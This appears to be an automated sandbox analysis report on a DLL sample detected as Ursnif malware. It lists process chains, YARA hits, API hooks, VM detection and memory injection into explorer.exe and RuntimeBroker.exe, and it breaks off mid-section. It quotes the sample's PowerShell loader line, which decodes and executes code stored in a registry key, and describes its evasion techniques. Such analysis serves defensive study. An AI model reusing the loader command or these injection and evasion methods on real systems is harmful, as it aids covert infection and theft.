Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9024.tmp' 'c:\Users\user\AppData\Local\Temp\idzehqcm\CSCED83507F240441029C9C6A47F2CB5CFA.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001C.00000002.404227102.000001796D8A0000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.416522356.0000024FD6D20000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000025.00000000.452374047.0000000006FE0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.420571619.0000000005A10000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.420571619.0000000005A10000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000022.00000002.475458101.0000021EAE11C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000022.00000002.475458101.0000021EAE11C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000025.00000000.452374047.0000000006FE0000.00000002.00000001.sdmp
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5505D RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_00E5505D
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CAF23 push ecx; ret 1_2_001CAF33
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CABF0 push ecx; ret 1_2_001CABF9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E7769F push ecx; ret 1_2_00E776AF
Source: C:\Windows\System32\control.exe Code function: 34_2_0019C115 push 3B000001h; retf 34_2_0019C11A
Source: C:\Windows\explorer.exe Code function: 37_2_03B5C115 push 3B000001h; retf 37_2_03B5C11A
Source: initial sample Static PE information: section name: .text entropy: 6.87914739574

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.342289663.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342468816.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342346721.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.412411530.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342261211.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342443739.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342379670.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.352943845.000000000519B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342460182.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342426080.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5236, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4616, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6684, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\RuntimeBroker.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
The value 922337203685477 is (2^63 - 1) / 10000, i.e. Int64.MaxValue in 100-ns timer units shown in milliseconds: an unbounded wait of roughly 29,000 years rather than a timed delay. On its own this is weak evidence of evasion, because infinite waits also occur in ordinary .NET synchronisation; the explicit sleep loops listed under "May sleep (evasive loops)" below are the stronger indicator.
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4663
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3950
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.dll
The Temp\<random>\<random>.dll layout, together with the .cmdline response file and the cvtres.exe RES*.tmp calls listed under process creation, is the .NET CodeDOM compile sequence that PowerShell Add-Type produces. The resulting assembly is consumed by the PowerShell process that requested it rather than started as a program, so the "not started" finding is expected here and is not a sign that the payload failed.
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\explorer.exe TID: 6556 Thread sleep time: -1667865539s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_001C3512
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E54CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_00E54CF1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_00E5B88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E65518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_00E65518
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00E5834C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6AACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_03B6AACC
Source: C:\Windows\explorer.exe Code function: 37_2_03B67500 FindFirstFileW, 37_2_03B67500
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E516E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_00E516E1
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local
Source: explorer.exe, 00000025.00000000.455635296.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.454294309.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000026.00000000.435135161.000002413A440000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.457597644.0000000008C56000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWt
Source: explorer.exe, 00000025.00000000.461375518.000000000DC9F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000025.00000002.566477532.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000025.00000000.456379955.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000025.00000000.449264209.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000025.00000000.454294309.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000025.00000000.454294309.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mshta.exe, 00000019.00000002.383288705.00000284FC4C1000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.456379955.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000025.00000000.454294309.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5505D RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_00E5505D
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E51F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_00E51F12

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\System32\control.exe base: 250000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 30B0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E766730000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
